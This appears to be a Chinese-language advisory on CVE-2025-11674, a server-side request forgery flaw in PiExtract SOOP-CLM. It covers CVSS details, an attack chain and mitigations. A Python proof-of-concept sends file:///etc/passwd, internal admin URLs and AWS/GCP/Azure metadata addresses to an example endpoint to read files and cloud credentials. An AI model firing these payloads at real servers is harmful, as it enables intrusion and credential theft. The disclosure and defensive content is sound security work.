CVE-2025-11674：PiExtract SOOP-CLM服务端请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-11674

漏洞类型

服务端请求伪造（SSRF）

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

PiExtract SOOP-CLM

漏洞概述

CVE-2025-11674是存在于PiExtract公司开发的SOOP-CLM产品中的一个服务端请求伪造（Server-Side Request Forgery, SSRF）漏洞。该漏洞由台湾计算机紧急响应中心（TWCERT）发现并报告，披露日期为2025年10月13日。CVSS 3.1评分为6.8分，属于中危级别漏洞。SOOP-CLM是一款内容管理类应用，该漏洞允许具有高权限的远程攻击者通过精心构造的请求，诱使服务器向内部网络或任意外部地址发起HTTP请求。攻击者可利用此漏洞读取服务器本地文件、探测内网拓扑结构及敏感服务信息，从而为后续更深层次的攻击（如内网渗透、横向移动）奠定基础。由于漏洞影响范围涉及机密性（C:H），且攻击向量为网络（AV:N），无需用户交互（UI:N），因此在企业内网环境中具有较高的实际威胁。需要特别注意的是，该漏洞的利用需要高权限（PR:H），这意味着攻击者需要先获得一定的系统访问权限才能触发该漏洞。

技术细节

服务端请求伪造（SSRF）是一种利用服务器端应用程序代替攻击者发起HTTP请求的安全漏洞。在SOOP-CLM中，存在未对用户提供的URL或网络资源地址进行充分校验和过滤的功能接口。攻击原理如下：

1. 攻击者通过身份验证获得SOOP-CLM系统的高权限账户访问权限（PR:H要求）。
2. 攻击者向存在漏洞的接口提交一个精心构造的URL地址，该地址可以指向内部网络资源（如http://127.0.0.1:8080/admin）、本地文件系统（如file:///etc/passwd）或云元数据服务（如http://169.254.169.254/）。
3. 服务器在未对目标地址进行白名单校验或协议限制的情况下，代替攻击者向该URL发起请求。
4. 服务器将请求的响应内容返回给攻击者，或根据响应内容执行后续操作。

利用方式主要包括：
- 通过file://协议读取服务器本地敏感文件（如配置文件、数据库凭证等）；
- 通过访问内网地址探测内部网络拓扑和服务端口；
- 通过访问云服务商元数据API获取临时凭证；
- 利用302重定向绕过简单的URL过滤机制。

由于该漏洞的CVSS向量中范围标记为S:C（Scope Changed），表明漏洞的影响范围超出了其原本的安全上下文，可能影响到其他安全域。

攻击链分析

STEP 1

步骤1：获取高权限凭证

攻击者通过钓鱼、社会工程或其他方式获取SOOP-CLM系统的高权限账户凭证（PR:H），登录目标系统。

STEP 2

步骤2：识别SSRF漏洞入口

攻击者通过分析系统功能（如URL预览、远程资源获取、Webhook配置、文件导入等功能接口），识别出存在SSRF漏洞的可利用端点。

STEP 3

步骤3：构造恶意请求

攻击者向存在漏洞的接口提交精心构造的URL，指向内部网络资源、本地文件系统或云元数据服务。

STEP 4

步骤4：执行SSRF攻击

服务器代替攻击者向目标URL发起请求，绕过网络访问控制，访问通常不可达的内部资源。

STEP 5

步骤5：信息收集与内网渗透

攻击者读取服务器本地敏感文件（如配置文件、凭证文件），探测内网拓扑和服务，为后续横向移动和权限提升奠定基础。

STEP 6

步骤6：扩大攻击范围

利用获取的内部信息，攻击者可进一步渗透内网其他系统，或利用云元数据凭证获取云资源访问权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11674 - SOOP-CLM SSRF PoC
# Vulnerability: Server-Side Request Forgery in PiExtract SOOP-CLM
# Requires: High privilege access (PR:H)

import requests

TARGET_URL = "https://target-soop-clm.example.com"
SESSION_COOKIE = "authenticated_session_cookie_here"  # High-privilege session

# Step 1: Read local files via file:// protocol
def exploit_file_read(file_path):
    """Read server local files using file:// protocol"""
    payload_url = f"file://{file_path}"
    response = requests.post(
        f"{TARGET_URL}/api/proxy",  # Example vulnerable endpoint
        cookies={"session": SESSION_COOKIE},
        json={"url": payload_url, "method": "GET"}
    )
    print(f"[+] Reading {file_path}:")
    print(response.text)

# Step 2: Probe internal network services
def exploit_internal_probe(internal_url):
    """Probe internal network services"""
    response = requests.post(
        f"{TARGET_URL}/api/proxy",
        cookies={"session": SESSION_COOKIE},
        json={"url": internal_url, "method": "GET"}
    )
    print(f"[+] Probing {internal_url} - Status: {response.status_code}")
    print(response.text[:500])

# Step 3: Access cloud metadata services
def exploit_cloud_metadata():
    """Access cloud metadata to retrieve IAM credentials"""
    metadata_urls = [
        "http://169.254.169.254/latest/meta-data/",  # AWS
        "http://metadata.google.internal/computeMetadata/v1/",  # GCP
        "http://169.254.169.254/metadata/instance"  # Azure
    ]
    for url in metadata_urls:
        exploit_internal_probe(url)

if __name__ == "__main__":
    # Example exploitation
    exploit_file_read("/etc/passwd")
    exploit_internal_probe("http://127.0.0.1:8080/admin")
    exploit_cloud_metadata()

影响范围

PiExtract SOOP-CLM（具体版本待官方确认）

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）对所有需要外部资源访问的功能接口实施URL白名单策略，仅允许访问业务必需的外部域名；2）在网络层面限制SOOP-CLM服务器主动外联，配置防火墙规则阻断对内网私有IP地址段的访问；3）禁用或限制file://、gopher://等危险协议的解析；4）加强访问控制审计，监控异常的URL请求行为；5）限制高权限账户的使用范围，避免凭证泄露；6）部署入侵检测系统（IDS）监控SSRF攻击特征。